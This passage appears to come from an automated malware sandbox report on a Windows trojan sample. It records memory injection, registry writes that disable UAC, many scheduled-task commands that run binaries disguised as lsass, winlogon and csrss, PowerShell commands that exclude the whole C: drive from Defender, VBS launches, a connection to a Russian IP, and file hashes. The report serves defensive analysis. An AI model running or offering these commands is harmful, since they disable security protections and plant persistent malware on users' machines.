| PID 2284 wrote to memory of 988 | N/A | C:\Windows\System32\WScript.exe | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe |
| PID 988 wrote to memory of 1736 | N/A | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | C:\Windows\System32\WScript.exe |

System policy modification

evasion
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe | N/A |

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\78e93535702e2a553d85bac1d4737210_NeikiAnalytics.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\All Users\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Windows\Migration\WTR\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Windows\Migration\WTR\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Windows\Offline Web Pages\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Windows\Offline Web Pages\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Portable Devices\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Portable Devices\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Google\Chrome\Application\SetupMetrics\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\SetupMetrics\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files\Google\Chrome\Application\SetupMetrics\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\security\templates\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\security\templates\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\security\templates\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 14 /tr "'C:\Windows\debug\WIA\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\debug\WIA\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Windows\debug\WIA\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Games\Minesweeper\ja-JP\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Microsoft Games\Minesweeper\ja-JP\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Games\Minesweeper\ja-JP\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Mail\ja-JP\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\ja-JP\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Mail\ja-JP\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Recovery\84917bc2-d02e-11ee-b7c7-ea6b8212ffd3\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Idle.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Admin\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Windows\Media\Festival\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\Media\Festival\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Windows\Media\Festival\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Uninstall Information\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Uninstall Information\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Uninstall Information\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Downloads\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Admin\Downloads\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\Downloads\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Windows\L2Schemas\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\L2Schemas\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Windows\L2Schemas\explorer.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YD2Vui68H4.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\eb0bdaa7-9959-44b3-b275-374c23ad3dbc.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\82436d53-5309-40f3-ac36-a474d00d2904.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\253cfe41-456b-4717-828b-437aed799842.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2f7105e9-eb91-440a-b555-39f520978e6d.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a51755b3-c6df-49e0-84af-fe8af15f789c.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bf1c885f-f97d-46b0-8fdc-447da0d21c07.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b8f0c640-1635-45c6-9063-0d28594d2599.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\958268e6-247d-499a-80f9-17f84dedb9b3.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2dd08480-8628-4cee-9175-699b2c66e957.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2b37cde5-6c51-43c0-aebf-5e27ad6daf7f.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9251f47c-65a6-4c9d-a482-2abb570dde81.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8ff150a1-e436-4a07-aee7-fe560b0c5d25.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0c46e484-0032-424b-92cf-c0b0f37b9fc9.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\363490ec-67ae-4630-acb1-1fd1655d4903.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e4b73624-ddb4-4c31-8677-d0856c66f541.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\08597b29-db66-4aa1-b040-ee44b0a0b9c0.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e8697ec9-b9e3-439a-8b53-dbb4966a7231.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5f86e840-b08f-466c-aaa5-cd3b2caafc51.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a7f26326-349f-4229-b1e3-0ad737bc2fcc.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b5461f44-f0e2-41e9-a039-50115ad6a6e3.vbs"

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe

"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\smss.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f7daee9d-82b9-4f22-a005-16c8163551ed.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\734fcb3a-0633-4c18-8dbb-faf65501af97.vbs"

Network

Country Destination Domain Proto Count
RU 149.154.68.247:80 149.154.68.247 tcp 10 connections

Files

C:\Program Files\Google\Chrome\Application\SetupMetrics\winlogon.exe

MD5 78e93535702e2a553d85bac1d4737210
SHA1 572ed789a4da08d6c3cc770b4b49bb6d6a4ea75f
SHA256 b6d844ec087f7be57656bfb4782919dbe0cf823301b441e68b7a7a8e757049fb
SHA512 ad2ff42ed3569df69618af61d3732744c3aa713816709dbe53b11ee07df97f744acd99c26155485a3dac76a4576592e181e3198bbaad86009de716b72a183baa

C:\Users\Admin\Downloads\lsass.exe

MD5 9e975e4571f20460374c62ea829340aa
SHA1 25b227e24e881e1cce4369c3c65c3ba607afbbc4
SHA256 77f6112d0389830cb25aab10c52c379a96b5eb410b8588fad32fa9e4e27523b2
SHA512 bcacf613713f7c529179cf9c6ca052bde56a266a162c7d867a7a6866c21c2a2e303940841a03d078dc9b751b6920fbbfc9648af87bff29de3085d42d2953797d

C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\RCX3CC2.tmp

MD5 20031fc68f0287c5c554218150f79ff9
SHA1 cede0659c8d1c8eb7b655c81a0d61a51cf00a002
SHA256 b420d44742a0ab56d0385b0c546d40f5e3038c19f3cde5621969c75709e60562
SHA512 09fac858adeb33fcbced8e81d4469879fc56124e84bafbb2bae855f75dbdb453f7c03645c10ffc1a8fc774a7fa66a6151e575eec08d82ffa55202dfdbc492452

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 2f7e0827bd66c30c0448e0e53ab8e3cd
SHA1 687002a7fef17843fa22ac3fda77cf7fc747dd1c
SHA256 46bb4517067409bf6deef0d56bce94a6dc13e9d6357e70dd84423aa9fbffe4e6
SHA512 76bc6bd81fad46d928cca300d63427b7a65e02f40a4f36e0cd55eb9ea17a34dc108a0dd5e3849ed598eda41e3718aef031d512b947310a430483ed3b5aba7cec

C:\Users\Admin\AppData\Local\Temp\YD2Vui68H4.bat

MD5 d2ce7ce9a8e2ab1c085033f49ce8015c
SHA1 e9878170b38faec1c3efc484d29bc3716a571d0d
SHA256 3f8bc9b4d859cc0b2a603b0a23a37298404f40345b83efd244bf232d8255ee08
SHA512 60cc2fc0204061fcf87e4fb21c3ab2b9a1a67bac44ea06981c92c28239c4da11c6b63a92f625e3fb555c3ceeaedde1fbb52759f0c8d7ad1c0557df1e1468f1f9

C:\Users\Admin\AppData\Local\Temp\eb0bdaa7-9959-44b3-b275-374c23ad3dbc.vbs

MD5 7935ab7aab8aeeef9cb5017464e1bd26
SHA1 b608350eba8781af1ab45678ffa33f2321db3dc6
